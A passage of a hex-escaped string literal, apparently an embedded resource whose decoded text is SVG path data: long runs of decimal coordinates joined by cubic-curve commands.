\x30\x39\x35\x30\x35\x34\x39\x37\x20\x31\x31\x2e\x38\x36\x31\x35\
\x31\x38\x38\x38\x39\x31\x20\x43\x20\x35\x2e\x30\x35\x37\x33\x33\
\x36\x31\x32\x33\x38\x20\x31\x31\x2e\x38\x31\x39\x36\x34\x34\x30\
\x36\x36\x36\x20\x35\x2e\x30\x36\x33\x35\x37\x37\x31\x39\x32\x36\
\x34\x20\x31\x31\x2e\x37\x37\x37\x38\x34\x34\x31\x36\x33\x38\x20\
\x35\x2e\x30\x36\x39\x38\x31\x38\x32\x36\x31\x34\x38\x20\x31\x31\
\x2e\x37\x33\x36\x31\x35\x30\x39\x33\x39\x37\x20\x43\x20\x35\x2e\
\x30\x37\x36\x30\x35\x39\x33\x33\x30\x33\x31\x20\x31\x31\x2e\x36\
\x39\x34\x34\x35\x37\x37\x31\x35\x35\x20\x35\x2e\x30\x38\x32\x33\
\x30\x30\x33\x39\x39\x31\x35\x20\x31\x31\x2e\x36\x35\x32\x38\x37\
\x31\x38\x31\x34\x39\x20\x35\x2e\x30\x38\x38\x35\x34\x31\x34\x36\
\x37\x39\x38\x20\x31\x31\x2e\x36\x31\x31\x34\x32\x34\x36\x33\x38\
\x20\x43\x20\x35\x2e\x30\x39\x34\x37\x38\x32\x35\x33\x36\x38\x32\
\x20\x31\x31\x2e\x35\x36\x39\x39\x37\x37\x34\x36\x31\x31\x20\x35\
\x2e\x31\x30\x31\x30\x32\x33\x36\x30\x35\x36\x36\x20\x31\x31\x2e\
\x35\x32\x38\x36\x36\x39\x38\x34\x35\x36\x20\x35\x2e\x31\x30\x37\
\x32\x36\x34\x36\x37\x34\x34\x39\x20\x31\x31\x2e\x34\x38\x37\x35\
\x33\x32\x37\x38\x34\x36\x20\x43\x20\x35\x2e\x31\x31\x33\x35\x30\
\x35\x37\x34\x33\x33\x33\x20\x31\x31\x2e\x34\x34\x36\x33\x39\x35\
\x37\x32\x33\x35\x20\x35\x2e\x31\x31\x39\x37\x34\x36\x38\x31\x32\
\x31\x37\x20\x31\x31\x2e\x34\x30\x35\x34\x33\x30\x32\x34\x36\x20\
\x35\x2e\x31\x32\x35\x39\x38\x37\x38\x38\x31\x20\x31\x31\x2e\x33\
\x36\x34\x36\x36\x36\x38\x39\x30\x31\x20\x43\x20\x35\x2e\x31\x33\
\x32\x32\x32\x38\x39\x34\x39\x38\x34\x20\x31\x31\x2e\x33\x32\x33\
\x39\x30\x33\x35\x33\x34\x31\x20\x35\x2e\x31\x33\x38\x34\x37\x30\
\x30\x31\x38\x36\x37\x20\x31\x31\x2e\x32\x38\x33\x33\x34\x33\x35\
\x31\x38\x36\x20\x35\x2e\x31\x34\x34\x37\x31\x31\x30\x38\x37\x35\
\x31\x20\x31\x31\x2e\x32\x34\x33\x30\x31\x36\x38\x37\x39\x33\x20\
\x43\x20\x35\x2e\x31\x35\x30\x39\x35\x32\x31\x35\x36\x33\x35\x20\
\x31\x31\x2e\x32\x30\x32\x36\x39\x30\x32\x34\x20\x35\x2e\x31\x35\
\x37\x31\x39\x33\x32\x32\x35\x31\x38\x20\x31\x31\x2e\x31\x36\x32\
\x35\x39\x38\x33\x38\x33\x37\x20\x35\x2e\x31\x36\x33\x34\x33\x34\
\x32\x39\x34\x30\x32\x20\x31\x31\x2e\x31\x32\x32\x37\x37\x30\x37\
\x39\x37\x35\x20\x43\x20\x35\x2e\x31\x36\x39\x36\x37\x35\x33\x36\
\x32\x38\x35\x20\x31\x31\x2e\x30\x38\x32\x39\x34\x33\x32\x31\x31\
\x32\x20\x35\x2e\x31\x37\x35\x39\x31\x36\x34\x33\x31\x36\x39\x20\
\x31\x31\x2e\x30\x34\x33\x33\x38\x31\x34\x38\x37\x37\x20\x35\x2e\
\x31\x38\x32\x31\x35\x37\x35\x30\x30\x35\x33\x20\x31\x31\x2e\x30\
\x30\x34\x31\x31\x34\x35\x31\x39\x37\x20\x43\x20\x35\x2e\x31\x38\
\x38\x33\x39\x38\x35\x36\x39\x33\x36\x20\x31\x30\x2e\x39\x36\x34\
\x38\x34\x37\x35\x35\x31\x36\x20\x35\x2e\x31\x39\x34\x36\x33\x39\
\x36\x33\x38\x32\x20\x31\x30\x2e\x39\x32\x35\x38\x37\x37\x31\x31\
\x35\x20\x35\x2e\x32\x30\x30\x38\x38\x30\x37\x30\x37\x30\x33\x20\
\x31\x30\x2e\x38\x38\x37\x32\x33\x31\x34\x36\x33\x35\x20\x43\x20\
\x35\x2e\x32\x30\x37\x31\x32\x31\x37\x37\x35\x38\x37\x20\x31\x30\
\x2e\x38\x34\x38\x35\x38\x35\x38\x31\x32\x20\x35\x2e\x32\x31\x33\
\x33\x36\x32\x38\x34\x34\x37\x31\x20\x31\x30\x2e\x38\x31\x30\x32\
\x36\x36\x39\x30\x32\x33\x20\x35\x2e\x32\x31\x39\x36\x30\x33\x39\
\x31\x33\x35\x34\x20\x31\x30\x2e\x37\x37\x32\x33\x30\x32\x33\x30\
\x35\x35\x20\x43\x20\x35\x2e\x32\x32\x35\x38\x34\x34\x39\x38\x32\
\x33\x38\x20\x31\x30\x2e\x37\x33\x34\x33\x33\x37\x37\x30\x38\x36\
\x20\x35\x2e\x32\x33\x32\x30\x38\x36\x30\x35\x31\x32\x31\x20\x31\
\x30\x2e\x36\x39\x36\x37\x32\x39\x35\x35\x38\x38\x20\x35\x2e\x32\
\x33\x38\x33\x32\x37\x31\x32\x30\x30\x35\x20\x31\x30\x2e\x36\x35\
\x39\x35\x30\x34\x37\x30\x31\x39\x20\x43\x20\x35\x2e\x32\x34\x34\
\x35\x36\x38\x31\x38\x38\x38\x39\x20\x31\x30\x2e\x36\x32\x32\x32\
\x37\x39\x38\x34\x34\x39\x20\x35\x2e\x32\x35\x30\x38\x30\x39\x32\
\x35\x37\x37\x32\x20\x31\x30\x2e\x35\x38\x35\x34\x34\x30\x35\x38\
\x39\x33\x20\x35\x2e\x32\x35\x37\x30\x35\x30\x33\x32\x36\x35\x36\
\x20\x31\x30\x2e\x35\x34\x39\x30\x31\x33\x30\x31\x34\x20\x43\x20\
\x35\x2e\x32\x36\x33\x32\x39\x31\x33\x39\x35\x33\x39\x20\x31\x30\
\x2e\x35\x31\x32\x35\x38\x35\x34\x33\x38\x37\x20\x35\x2e\x32\x36\
\x39\x35\x33\x32\x34\x36\x34\x32\x33\x20\x31\x30\x2e\x34\x37\x36\
\x35\x37\x32\x30\x32\x32\x39\x20\x35\x2e\x32\x37\x35\x37\x37\x33\
\x35\x33\x33\x30\x37\x20\x31\x30\x2e\x34\x34\x30\x39\x39\x38\x30\
\x33\x38\x36\x20\x43\x20\x35\x2e\x32\x38\x32\x30\x31\x34\x36\x30\
\x31\x39\x20\x31\x30\x2e\x34\x30\x35\x34\x32\x34\x30\x35\x34\x33\
\x20\x35\x2e\x32\x38\x38\x32\x35\x35\x36\x37\x30\x37\x34\x20\x31\
\x30\x2e\x33\x37\x30\x32\x39\x32\x31\x34\x37\x36\x20\x35\x2e\x32\
\x39\x34\x34\x39\x36\x37\x33\x39\x35\x37\x20\x31\x30\x2e\x33\x33\
\x35\x36\x32\x36\x37\x34\x34\x32\x20\x43\x20\x35\x2e\x33\x30\x30\
\x37\x33\x37\x38\x30\x38\x34\x31\x20\x31\x30\x2e\x33\x30\x30\x39\
\x36\x31\x33\x34\x30\x38\x20\x35\x2e\x33\x30\x36\x39\x37\x38\x38\
\x37\x37\x32\x35\x20\x31\x30\x2e\x32\x36\x36\x37\x36\x35\x32\x34\
\x39\x36\x20\x35\x2e\x33\x31\x33\x32\x31\x39\x39\x34\x36\x30\x38\
\x20\x31\x30\x2e\x32\x33\x33\x30\x36\x32\x30\x31\x32\x35\x20\x43\
\x20\x35\x2e\x33\x31\x39\x34\x36\x31\x30\x31\x34\x39\x32\x20\x31\
\x30\x2e\x31\x39\x39\x33\x35\x38\x37\x37\x35\x34\x20\x35\x2e\x33\
\x32\x35\x37\x30\x32\x30\x38\x33\x37\x35\x20\x31\x30\x2e\x31\x36\
\x36\x31\x35\x31\x33\x35\x39\x37\x20\x35\x2e\x33\x33\x31\x39\x34\
\x33\x31\x35\x32\x35\x39\x20\x31\x30\x2e\x31\x33\x33\x34\x36\x32\
\x33\x38\x36\x39\x20\x43\x20\x35\x2e\x33\x33\x38\x31\x38\x34\x32\
\x32\x31\x34\x33\x20\x31\x30\x2e\x31\x30\x30\x37\x37\x33\x34\x31\
\x34\x32\x20\x35\x2e\x33\x34\x34\x34\x32\x35\x32\x39\x30\x32\x36\
\x20\x31\x30\x2e\x30\x36\x38\x36\x30\x36\x30\x30\x35\x36\x20\x35\
\x2e\x33\x35\x30\x36\x36\x36\x33\x35\x39\x31\x20\x31\x30\x2e\x30\
\x33\x36\x39\x38\x31\x38\x32\x37\x36\x20\x43\x20\x35\x2e\x33\x35\
\x36\x39\x30\x37\x34\x32\x37\x39\x33\x20\x31\x30\x2e\x30\x30\x35\
\x33\x35\x37\x36\x34\x39\x35\x20\x35\x2e\x33\x36\x33\x31\x34\x38\
\x34\x39\x36\x37\x37\x20\x39\x2e\x39\x37\x34\x32\x37\x39\x39\x37\
\x32\x30\x38\x20\x35\x2e\x33\x36\x39\x33\x38\x39\x35\x36\x35\x36\
\x31\x20\x39\x2e\x39\x34\x33\x37\x36\x39\x34\x37\x32\x39\x34\x20\
\x43\x20\x35\x2e\x33\x37\x35\x36\x33\x30\x36\x33\x34\x34\x34\x20\
\x39\x2e\x39\x31\x33\x32\x35\x38\x39\x37\x33\x38\x31\x20\x35\x2e\
\x33\x38\x31\x38\x37\x31\x37\x30\x33\x32\x38\x20\x39\x2e\x38\x38\
\x33\x33\x31\x39\x30\x36\x37\x31\x34\x20\x35\x2e\x33\x38\x38\x31\
\x31\x32\x37\x37\x32\x31\x32\x20\x39\x2e\x38\x35\x33\x39\x36\x39\
\x34\x30\x39\x37\x35\x20\x43\x20\x35\x2e\x33\x39\x34\x33\x35\x33\
\x38\x34\x30\x39\x35\x20\x39\x2e\x38\x32\x34\x36\x31\x39\x37\x35\
\x32\x33\x36\x20\x35\x2e\x34\x30\x30\x35\x39\x34\x39\x30\x39\x37\
\x39\x20\x39\x2e\x37\x39\x35\x38\x36\x33\x38\x39\x37\x31\x38\x20\
\x35\x2e\x34\x30\x36\x38\x33\x35\x39\x37\x38\x36\x32\x20\x39\x2e\
\x37\x36\x37\x37\x32\x30\x34\x34\x39\x39\x32\x20\x43\x20\x35\x2e\
\x34\x31\x33\x30\x37\x37\x30\x34\x37\x34\x36\x20\x39\x2e\x37\x33\
\x39\x35\x37\x37\x30\x30\x32\x36\x35\x20\x35\x2e\x34\x31\x39\x33\
\x31\x38\x31\x31\x36\x33\x20\x39\x2e\x37\x31\x32\x30\x34\x39\x36\
\x34\x39\x34\x35\x20\x35\x2e\x34\x32\x35\x35\x35\x39\x31\x38\x35\
\x31\x33\x20\x39\x2e\x36\x38\x35\x31\x35\x35\x39\x31\x36\x31\x35\
\x20\x43\x20\x35\x2e\x34\x33\x31\x38\x30\x30\x32\x35\x33\x39\x37\
\x20\x39\x2e\x36\x35\x38\x32\x36\x32\x31\x38\x32\x38\x35\x20\x35\
\x2e\x34\x33\x38\x30\x34\x31\x33\x32\x32\x38\x20\x39\x2e\x36\x33\
\x32\x30\x30\x35\x38\x38\x33\x31\x31\x20\x35\x2e\x34\x34\x34\x32\
\x38\x32\x33\x39\x31\x36\x34\x20\x39\x2e\x36\x30\x36\x34\x30\x33\
\x34\x33\x35\x38\x20\x43\x20\x35\x2e\x34\x35\x30\x35\x32\x33\x34\
\x36\x30\x34\x38\x20\x39\x2e\x35\x38\x30\x38\x30\x30\x39\x38\x38\
\x35\x20\x35\x2e\x34\x35\x36\x37\x36\x34\x35\x32\x39\x33\x31\x20\
\x39\x2e\x35\x35\x35\x38\x35\x36\x33\x32\x38\x39\x32\x20\x35\x2e\
\x34\x36\x33\x30\x30\x35\x35\x39\x38\x31\x35\x20\x39\x2e\x35\x33\
\x31\x35\x38\x34\x37\x34\x33\x36\x20\x43\x20\x35\x2e\x34\x36\x39\
\x32\x34\x36\x36\x36\x36\x39\x38\x20\x39\x2e\x35\x30\x37\x33\x31\
\x33\x31\x35\x38\x32\x39\x20\x35\x2e\x34\x37\x35\x34\x38\x37\x37\
\x33\x35\x38\x32\x20\x39\x2e\x34\x38\x33\x37\x31\x38\x36\x39\x38\
\x30\x35\x20\x35\x2e\x34\x38\x31\x37\x32\x38\x38\x30\x34\x36\x36\
\x20\x39\x2e\x34\x36\x30\x38\x31\x35\x34\x39\x33\x34\x36\x20\x43\
\x20\x35\x2e\x34\x38\x37\x39\x36\x39\x38\x37\x33\x34\x39\x20\x39\
\x2e\x34\x33\x37\x39\x31\x32\x32\x38\x38\x38\x38\x20\x35\x2e\x34\
\x39\x34\x32\x31\x30\x39\x34\x32\x33\x33\x20\x39\x2e\x34\x31\x35\
\x37\x30\x34\x35\x30\x30\x30\x35\x20\x35\x2e\x35\x30\x30\x34\x35\
\x32\x30\x31\x31\x31\x36\x20\x39\x2e\x33\x39\x34\x32\x30\x35\x30\
\x37\x39\x37\x32\x20\x43\x20\x35\x2e\x35\x30\x36\x36\x39\x33\x30\
\x38\x20\x39\x2e\x33\x37\x32\x37\x30\x35\x36\x35\x39\x34\x20\x35\
\x2e\x35\x31\x32\x39\x33\x34\x31\x34\x38\x38\x34\x20\x39\x2e\x33\
\x35\x31\x39\x31\x38\x38\x37\x30\x35\x32\x20\x35\x2e\x35\x31\x39\
\x31\x37\x35\x32\x31\x37\x36\x37\x20\x39\x2e\x33\x33\x31\x38\x35\
\x36\x34\x36\x38\x30\x33\x20\x43\x20\x35\x2e\x35\x32\x35\x34\x31\
\x36\x32\x38\x36\x35\x31\x20\x39\x2e\x33\x31\x31\x37\x39\x34\x30\
\x36\x35\x35\x33\x20\x35\x2e\x35\x33\x31\x36\x35\x37\x33\x35\x35\
\x33\x34\x20\x39\x2e\x32\x39\x32\x34\x36\x30\x34\x30\x38\x36\x20\
\x35\x2e\x35\x33\x37\x38\x39\x38\x34\x32\x34\x31\x38\x20\x39\x2e\
\x32\x37\x33\x38\x36\x36\x30\x33\x36\x31\x38\x20\x43\x20\x35\x2e\
\x35\x34\x34\x31\x33\x39\x34\x39\x33\x30\x32\x20\x39\x2e\x32\x35\
\x35\x32\x37\x31\x36\x36\x33\x37\x36\x20\x35\x2e\x35\x35\x30\x33\
\x38\x30\x35\x36\x31\x38\x35\x20\x39\x2e\x32\x33\x37\x34\x32\x31\
\x30\x32\x34\x35\x33\x20\x35\x2e\x35\x35\x36\x36\x32\x31\x36\x33\
\x30\x36\x39\x20\x39\x2e\x32\x32\x30\x33\x32\x33\x34\x32\x35\x31\
\x36\x20\x43\x20\x35\x2e\x35\x36\x32\x38\x36\x32\x36\x39\x39\x35\
\x32\x20\x39\x2e\x32\x30\x33\x32\x32\x35\x38\x32\x35\x37\x38\x20\
\x35\x2e\x35\x36\x39\x31\x30\x33\x37\x36\x38\x33\x36\x20\x39\x2e\
\x31\x38\x36\x38\x38\x35\x37\x39\x37\x35\x39\x20\x35\x2e\x35\x37\
\x35\x33\x34\x34\x38\x33\x37\x32\x20\x39\x2e\x31\x37\x31\x33\x31\
\x31\x34\x30\x30\x35\x35\x20\x43\x20\x35\x2e\x35\x38\x31\x35\x38\
\x35\x39\x30\x36\x30\x33\x20\x39\x2e\x31\x35\x35\x37\x33\x37\x30\
\x30\x33\x35\x20\x35\x2e\x35\x38\x37\x38\x32\x36\x39\x37\x34\x38\
\x37\x20\x39\x2e\x31\x34\x30\x39\x33\x32\x38\x34\x34\x35\x38\x20\
\x35\x2e\x35\x39\x34\x30\x36\x38\x30\x34\x33\x37\x20\x39\x2e\x31\
\x32\x36\x39\x30\x35\x37\x32\x34\x36\x20\x43\x20\x35\x2e\x36\x30\
\x30\x33\x30\x39\x31\x31\x32\x35\x34\x20\x39\x2e\x31\x31\x32\x38\
\x37\x38\x36\x30\x34\x36\x32\x20\x35\x2e\x36\x30\x36\x35\x35\x30\
\x31\x38\x31\x33\x38\x20\x39\x2e\x30\x39\x39\x36\x33\x33\x31\x39\
\x39\x30\x36\x20\x35\x2e\x36\x31\x32\x37\x39\x31\x32\x35\x30\x32\
\x31\x20\x39\x2e\x30\x38\x37\x31\x37\x35\x30\x33\x39\x31\x32\x20\
\x43\x20\x35\x2e\x36\x31\x39\x30\x33\x32\x33\x31\x39\x30\x35\x20\
\x39\x2e\x30\x37\x34\x37\x31\x36\x38\x37\x39\x31\x37\x20\x35\x2e\
\x36\x32\x35\x32\x37\x33\x33\x38\x37\x38\x38\x20\x39\x2e\x30\x36\
\x33\x30\x35\x30\x37\x30\x31\x35\x39\x20\x35\x2e\x36\x33\x31\x35\
\x31\x34\x34\x35\x36\x37\x32\x20\x39\x2e\x30\x35\x32\x31\x38\x30\
\x37\x35\x39\x33\x37\x20\x43\x20\x35\x2e\x36\x33\x37\x37\x35\x35\
\x35\x32\x35\x35\x36\x20\x39\x2e\x30\x34\x31\x33\x31\x30\x38\x31\
\x37\x31\x34\x20\x35\x2e\x36\x34\x33\x39\x39\x36\x35\x39\x34\x33\
\x39\x20\x39\x2e\x30\x33\x31\x32\x34\x31\x39\x30\x30\x39\x39\x20\
\x35\x2e\x36\x35\x30\x32\x33\x37\x36\x36\x33\x32\x33\x20\x39\x2e\
\x30\x32\x31\x39\x37\x36\x39\x37\x39\x31\x32\x20\x43\x20\x35\x2e\
\x36\x35\x36\x34\x37\x38\x37\x33\x32\x30\x37\x20\x39\x2e\x30\x31\
\x32\x37\x31\x32\x30\x35\x37\x32\x35\x20\x35\x2e\x36\x36\x32\x37\
\x31\x39\x38\x30\x30\x39\x20\x39\x2e\x30\x30\x34\x32\x35\x35\x39\
\x36\x36\x39\x35\x20\x35\x2e\x36\x36\x38\x39\x36\x30\x38\x36\x39\
\x37\x34\x20\x38\x2e\x39\x39\x36\x36\x31\x30\x33\x38\x37\x30\x36\
\x20\x43\x20\x35\x2e\x36\x37\x35\x32\x30\x31\x39\x33\x38\x35\x37\
\x20\x38\x2e\x39\x38\x38\x39\x36\x34\x38\x30\x37\x31\x36\x20\x35\
\x2e\x36\x38\x31\x34\x34\x33\x30\x30\x37\x34\x31\x20\x38\x2e\x39\
\x38\x32\x31\x33\x34\x36\x31\x34\x30\x34\x20\x35\x2e\x36\x38\x37\
\x36\x38\x34\x30\x37\x36\x32\x35\x20\x38\x2e\x39\x37\x36\x31\x32\
\x30\x31\x39\x34\x35\x37\x20\x43\x20\x35\x2e\x36\x39\x33\x39\x32\
\x35\x31\x34\x35\x30\x38\x20\x38\x2e\x39\x37\x30\x31\x30\x35\x37\
\x37\x35\x31\x20\x35\x2e\x37\x30\x30\x31\x36\x36\x32\x31\x33\x39\
\x32\x20\x38\x2e\x39\x36\x34\x39\x31\x32\x30\x33\x37\x32\x20\x35\
\x2e\x37\x30\x36\x34\x30\x37\x32\x38\x32\x37\x35\x20\x38\x2e\x39\
\x36\x30\x35\x33\x38\x30\x37\x35\x31\x38\x20\x43\x20\x35\x2e\x37\
\x31\x32\x36\x34\x38\x33\x35\x31\x35\x39\x20\x38\x2e\x39\x35\x36\
\x31\x36\x34\x31\x31\x33\x31\x37\x20\x35\x2e\x37\x31\x38\x38\x38\
\x39\x34\x32\x30\x34\x33\x20\x38\x2e\x39\x35\x32\x36\x31\x34\x38\
\x35\x38\x39\x20\x35\x2e\x37\x32\x35\x31\x33\x30\x34\x38\x39\x32\
\x36\x20\x38\x2e\x39\x34\x39\x38\x38\x38\x31\x31\x35\x35\x36\x20\
\x43\x20\x35\x2e\x37\x33\x31\x33\x37\x31\x35\x35\x38\x31\x20\x38\
\x2e\x39\x34\x37\x31\x36\x31\x33\x37\x32\x32\x32\x20\x35\x2e\x37\
\x33\x37\x36\x31\x32\x36\x32\x36\x39\x33\x20\x38\x2e\x39\x34\x35\
\x32\x36\x32\x30\x38\x38\x20\x35\x2e\x37\x34\x33\x38\x35\x33\x36\
\x39\x35\x37\x37\x20\x38\x2e\x39\x34\x34\x31\x38\x36\x37\x37\x38\
\x33\x20\x43\x20\x35\x2e\x37\x35\x30\x30\x39\x34\x37\x36\x34\x36\
\x31\x20\x38\x2e\x39\x34\x33\x31\x31\x31\x34\x36\x38\x36\x20\x35\
\x2e\x37\x35\x36\x33\x33\x35\x38\x33\x33\x34\x34\x20\x38\x2e\x39\
\x34\x32\x38\x36\x35\x30\x39\x30\x33\x31\x20\x35\x2e\x37\x36\x32\
\x35\x37\x36\x39\x30\x32\x32\x38\x20\x38\x2e\x39\x34\x33\x34\x34\
\x32\x38\x37\x36\x34\x35\x20\x43\x20\x35\x2e\x37\x36\x38\x38\x31\
\x37\x39\x37\x31\x31\x31\x20\x38\x2e\x39\x34\x34\x30\x32\x30\x36\
\x36\x32\x36\x20\x35\x2e\x37\x37\x35\x30\x35\x39\x30\x33\x39\x39\
\x35\x20\x38\x2e\x39\x34\x35\x34\x32\x37\x35\x37\x31\x30\x39\x20\
\x35\x2e\x37\x38\x31\x33\x30\x30\x31\x30\x38\x37\x39\x20\x38\x2e\
\x39\x34\x37\x36\x35\x37\x35\x35\x39\x39\x35\x20\x43\x20\x35\x2e\
\x37\x38\x37\x35\x34\x31\x31\x37\x37\x36\x32\x20\x38\x2e\x39\x34\
\x39\x38\x38\x37\x35\x34\x38\x38\x31\x20\x35\x2e\x37\x39\x33\x37\
\x38\x32\x32\x34\x36\x34\x36\x20\x38\x2e\x39\x35\x32\x39\x34\x35\
\x35\x36\x39\x32\x39\x20\x35\x2e\x38\x30\x30\x30\x32\x33\x33\x31\
\x35\x32\x39\x20\x38\x2e\x39\x35\x36\x38\x32\x34\x33\x31\x33\x37\
\x37\x20\x43\x20\x35\x2e\x38\x30\x36\x32\x36\x34\x33\x38\x34\x31\
\x33\x20\x38\x2e\x39\x36\x30\x37\x30\x33\x30\x35\x38\x32\x35\x20\
\x35\x2e\x38\x31\x32\x35\x30\x35\x34\x35\x32\x39\x37\x20\x38\x2e\
\x39\x36\x35\x34\x30\x37\x34\x36\x33\x36\x37\x20\x35\x2e\x38\x31\
\x38\x37\x34\x36\x35\x32\x31\x38\x20\x38\x2e\x39\x37\x30\x39\x32\
\x38\x39\x36\x38\x30\x35\x20\x43\x20\x35\x2e\x38\x32\x34\x39\x38\
\x37\x35\x39\x30\x36\x34\x20\x38\x2e\x39\x37\x36\x34\x35\x30\x34\
\x37\x32\x34\x32\x20\x35\x2e\x38\x33\x31\x32\x32\x38\x36\x35\x39\
\x34\x37\x20\x38\x2e\x39\x38\x32\x37\x39\x33\x39\x39\x30\x37\x37\
\x20\x35\x2e\x38\x33\x37\x34\x36\x39\x37\x32\x38\x33\x31\x20\x38\
\x2e\x39\x38\x39\x39\x34\x39\x37\x31\x39\x39\x36\x20\x43\x20\x35\
\x2e\x38\x34\x33\x37\x31\x30\x37\x39\x37\x31\x35\x20\x38\x2e\x39\
\x39\x37\x31\x30\x35\x34\x34\x39\x31\x35\x20\x35\x2e\x38\x34\x39\
\x39\x35\x31\x38\x36\x35\x39\x38\x20\x39\x2e\x30\x30\x35\x30\x37\
\x38\x32\x37\x34\x36\x39\x20\x35\x2e\x38\x35\x36\x31\x39\x32\x39\
\x33\x34\x38\x32\x20\x39\x2e\x30\x31\x33\x38\x35\x37\x31\x36\x37\
\x34\x35\x20\x43\x20\x35\x2e\x38\x36\x32\x34\x33\x34\x30\x30\x33\
\x36\x35\x20\x39\x2e\x30\x32\x32\x36\x33\x36\x30\x36\x30\x32\x31\
\x20\x35\x2e\x38\x36\x38\x36\x37\x35\x30\x37\x32\x34\x39\x20\x39\
\x2e\x30\x33\x32\x32\x32\x35\x38\x36\x38\x36\x32\x20\x35\x2e\x38\
\x37\x34\x39\x31\x36\x31\x34\x31\x33\x33\x20\x39\x2e\x30\x34\x32\
\x36\x31\x34\x33\x35\x34\x36\x33\x20\x43\x20\x35\x2e\x38\x38\x31\
\x31\x35\x37\x32\x31\x30\x31\x36\x20\x39\x2e\x30\x35\x33\x30\x30\
\x32\x38\x34\x30\x36\x34\x20\x35\x2e\x38\x38\x37\x33\x39\x38\x32\
\x37\x39\x20\x39\x2e\x30\x36\x34\x31\x39\x34\x38\x30\x38\x31\x20\
\x35\x2e\x38\x39\x33\x36\x33\x39\x33\x34\x37\x38\x33\x20\x39\x2e\
\x30\x37\x36\x31\x37\x36\x38\x32\x38\x39\x35\x20\x43\x20\x35\x2e\
\x38\x39\x39\x38\x38\x30\x34\x31\x36\x36\x37\x20\x39\x2e\x30\x38\
\x38\x31\x35\x38\x38\x34\x39\x38\x31\x20\x35\x2e\x39\x30\x36\x31\
\x32\x31\x34\x38\x35\x35\x31\x20\x39\x2e\x31\x30\x30\x39\x33\x35\
\x36\x37\x35\x39\x31\x20\x35\x2e\x39\x31\x32\x33\x36\x32\x35\x35\
\x34\x33\x34\x20\x39\x2e\x31\x31\x34\x34\x39\x32\x37\x30\x39\x39\
\x33\x20\x43\x20\x35\x2e\x39\x31\x38\x36\x30\x33\x36\x32\x33\x31\
\x38\x20\x39\x2e\x31\x32\x38\x30\x34\x39\x37\x34\x33\x39\x34\x20\
\x35\x2e\x39\x32\x34\x38\x34\x34\x36\x39\x32\x30\x32\x20\x39\x2e\
\x31\x34\x32\x33\x39\x31\x36\x37\x38\x34\x20\x35\x2e\x39\x33\x31\
\x30\x38\x35\x37\x36\x30\x38\x35\x20\x39\x2e\x31\x35\x37\x35\x30\
\x32\x37\x36\x39\x32\x37\x20\x43\x20\x35\x2e\x39\x33\x37\x33\x32\
\x36\x38\x32\x39\x36\x39\x20\x39\x2e\x31\x37\x32\x36\x31\x33\x38\
\x36\x30\x31\x34\x20\x35\x2e\x39\x34\x33\x35\x36\x37\x38\x39\x38\
\x35\x32\x20\x39\x2e\x31\x38\x38\x34\x39\x38\x37\x33\x33\x33\x34\
\x20\x35\x2e\x39\x34\x39\x38\x30\x38\x39\x36\x37\x33\x36\x20\x39\
\x2e\x32\x30\x35\x31\x34\x30\x35\x32\x32\x35\x31\x20\x43\x20\x35\
\x2e\x39\x35\x36\x30\x35\x30\x30\x33\x36\x32\x20\x39\x2e\x32\x32\
\x31\x37\x38\x32\x33\x31\x31\x36\x37\x20\x35\x2e\x39\x36\x32\x32\
\x39\x31\x31\x30\x35\x30\x33\x20\x39\x2e\x32\x33\x39\x31\x38\x35\
\x35\x36\x38\x39\x36\x20\x35\x2e\x39\x36\x38\x35\x33\x32\x31\x37\
\x33\x38\x37\x20\x39\x2e\x32\x35\x37\x33\x33\x32\x33\x33\x31\x37\
\x32\x20\x43\x20\x35\x2e\x39\x37\x34\x37\x37\x33\x32\x34\x32\x37\
\x20\x39\x2e\x32\x37\x35\x34\x37\x39\x30\x39\x34\x34\x38\x20\x35\
\x2e\x39\x38\x31\x30\x31\x34\x33\x31\x31\x35\x34\x20\x39\x2e\x32\
\x39\x34\x33\x37\x33\x38\x33\x34\x30\x39\x20\x35\x2e\x39\x38\x37\
\x32\x35\x35\x33\x38\x30\x33\x38\x20\x39\x2e\x33\x31\x33\x39\x39\
\x37\x35\x31\x39\x33\x38\x20\x43\x20\x35\x2e\x39\x39\x33\x34\x39\
\x36\x34\x34\x39\x32\x31\x20\x39\x2e\x33\x33\x33\x36\x32\x31\x32\
\x30\x34\x36\x36\x20\x35\x2e\x39\x39\x39\x37\x33\x37\x35\x31\x38\
\x30\x35\x20\x39\x2e\x33\x35\x33\x39\x37\x38\x32\x31\x39\x33\x31\
\x20\x36\x2e\x30\x30\x35\x39\x37\x38\x35\x38\x36\x38\x38\x20\x39\
\x2e\x33\x37\x35\x30\x34\x38\x34\x39\x33\x30\x35\x20\x43\x20\x36\
\x2e\x30\x31\x32\x32\x31\x39\x36\x35\x35\x37\x32\x20\x39\x2e\x33\
\x39\x36\x31\x31\x38\x37\x36\x36\x37\x39\x20\x36\x2e\x30\x31\x38\
\x34\x36\x30\x37\x32\x34\x35\x36\x20\x39\x2e\x34\x31\x37\x39\x30\
\x36\x35\x38\x38\x38\x32\x20\x36\x2e\x30\x32\x34\x37\x30\x31\x37\
\x39\x33\x33\x39\x20\x39\x2e\x34\x34\x30\x33\x39\x30\x38\x38\x30\
\x38\x31\x20\x43\x20\x36\x2e\x30\x33\x30\x39\x34\x32\x38\x36\x32\
\x32\x33\x20\x39\x2e\x34\x36\x32\x38\x37\x35\x31\x37\x32\x38\x20\
\x36\x2e\x30\x33\x37\x31\x38\x33\x39\x33\x31\x30\x36\x20\x39\x2e\
\x34\x38\x36\x30\x36\x30\x31\x32\x32\x38\x35\x20\x36\x2e\x30\x34\
\x33\x34\x32\x34\x39\x39\x39\x39\x20\x39\x2e\x35\x30\x39\x39\x32\
\x33\x36\x37\x37\x31\x31\x20\x43\x20\x36\x2e\x30\x34\x39\x36\x36\
\x36\x30\x36\x38\x37\x34\x20\x39\x2e\x35\x33\x33\x37\x38\x37\x32\
\x33\x31\x33\x38\x20\x36\x2e\x30\x35\x35\x39\x30\x37\x31\x33\x37\
\x35\x37\x20\x39\x2e\x35\x35\x38\x33\x33\x33\x34\x37\x30\x34\x20\
\x36\x2e\x30\x36\x32\x31\x34\x38\x32\x30\x36\x34\x31\x20\x39\x2e\
\x35\x38\x33\x35\x33\x39\x33\x39\x38\x39\x32\x20\x43\x20\x36\x2e\
\x30\x36\x38\x33\x38\x39\x32\x37\x35\x32\x34\x20\x39\x2e\x36\x30\
\x38\x37\x34\x35\x33\x32\x37\x34\x34\x20\x36\x2e\x30\x37\x34\x36\
\x33\x30\x33\x34\x34\x30\x38\x20\x39\x2e\x36\x33\x34\x36\x31\x34\
\x39\x31\x32\x31\x32\x20\x36\x2e\x30\x38\x30\x38\x37\x31\x34\x31\
